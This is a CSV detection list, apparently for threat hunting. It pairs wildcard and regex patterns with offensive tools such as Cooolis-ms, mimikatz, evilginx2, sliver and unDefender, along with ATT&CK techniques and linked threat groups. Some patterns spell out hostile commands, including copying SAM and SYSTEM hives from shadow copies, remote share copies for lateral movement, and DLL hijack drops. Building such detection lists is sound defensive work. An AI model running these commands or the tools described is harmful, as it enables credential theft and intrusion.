"*Cooolis*shellcode*",".{0,1000}Cooolis.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38859"
"*CooolisAdjustTokenPrivileges*",".{0,1000}CooolisAdjustTokenPrivileges.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38860"
"*CooolisCreateRemoteThread*",".{0,1000}CooolisCreateRemoteThread.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38861"
"*Cooolis-ExternalC2*",".{0,1000}Cooolis\-ExternalC2.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38862"
"*Cooolis-ms.exe*",".{0,1000}Cooolis\-ms\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38863"
"*Cooolis-msf*",".{0,1000}Cooolis\-msf.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38864"
"*Cooolis-msX64.zip*",".{0,1000}Cooolis\-msX64\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38865"
"*Cooolis-msX86.zip*",".{0,1000}Cooolis\-msX86\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38866"
"*Cooolis-Reflective*",".{0,1000}Cooolis\-Reflective.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38867"
"*Cooolis-Shellcode*",".{0,1000}Cooolis\-Shellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38868"
"*Cooolis-String.*",".{0,1000}Cooolis\-String\..{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38869"
"*CooolisVirtualAlloc*",".{0,1000}CooolisVirtualAlloc.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38870"
"*copy *.exe \\*\c$\Windows\foxprow.exe*",".{0,1000}copy\s.{0,1000}\.exe\s\\\\.{0,1000}\\c\$\\Windows\\foxprow\.exe.{0,1000}","offensive_tool_keyword","copy","DCOM Lateral Movement technique leveraging Excel and ActivateMicrosoftApp works.","T1021.003 - T1566.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://x.com/ACEResponder/status/1720906842631549377","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38872"
"*copy *\legit.sys *Windows\System32\Drivers\*.sys*",".{0,1000}copy\s.{0,1000}\\legit\.sys\s.{0,1000}Windows\\System32\\Drivers\\.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","38873"
"*copy *PROCEXP.sys*C:\Windows\System32\WindowsPowershell\*",".{0,1000}copy\s.{0,1000}PROCEXP\.sys.{0,1000}C\:\\Windows\\System32\\WindowsPowershell\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","38876"
"*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\*",".{0,1000}copy\s\\.{0,1000}\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam\sC\:\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38879"
"*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\*",".{0,1000}copy\s\\.{0,1000}\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system\sC\:\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38880"
"*COPY anyproxy/ ./anyproxy/*",".{0,1000}COPY\sanyproxy\/\s\.\/anyproxy\/.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#linux","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","38881"
"*copy Tsutsuji_x64.dll %appdata%*Local\Microsoft\WindowsApps\BluetoothDiagnosticUtil.dll*",".{0,1000}copy\sTsutsuji_x64\.dll\s\%appdata\%.{0,1000}Local\\Microsoft\\WindowsApps\\BluetoothDiagnosticUtil\.dll.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","38884"
"*CopyAndPasteEnum.bat*",".{0,1000}CopyAndPasteEnum\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","38886"
"*CopyAndPasteFileDownloader.bat*",".{0,1000}CopyAndPasteFileDownloader\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","38887"
"*Copy-Item -Path * -Destination \\$IP\transfer*",".{0,1000}Copy\-Item\s\-Path\s.{0,1000}\s\-Destination\s\\\\\$IP\\transfer.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","38889"
"*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*",".{0,1000}Copyright\s\(c\)\s2007\s\-\s2021\sgentilkiwi\s\(Benjamin\sDELPY\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","38890"
"*Copyright (c) 2023 whoamianony.top*",".{0,1000}Copyright\s\(c\)\s2023\swhoamianony\.top.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","38891"
"*cordyceps.exe*",".{0,1000}cordyceps\.exe.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","N/A","10","","N/A","","","","38892"
"*Cordyceps-main.zip*",".{0,1000}Cordyceps\-main\.zip.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","N/A","10","","N/A","","","","38893"
"*core/handler/reverse*",".{0,1000}core\/handler\/reverse.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38894"
"*core/http_proxy.go*",".{0,1000}core\/http_proxy\.go.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","False positives expected","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","38895"
"*core/sprayers/lync.py*",".{0,1000}core\/sprayers\/lync\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","38896"
"*core/teamserver/stagers/*",".{0,1000}core\/teamserver\/stagers\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","38897"
"*coreImplantFlags binds all flags common to all sliver implant types*",".{0,1000}coreImplantFlags\sbinds\sall\sflags\scommon\sto\sall\ssliver\simplant\stypes.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38898"
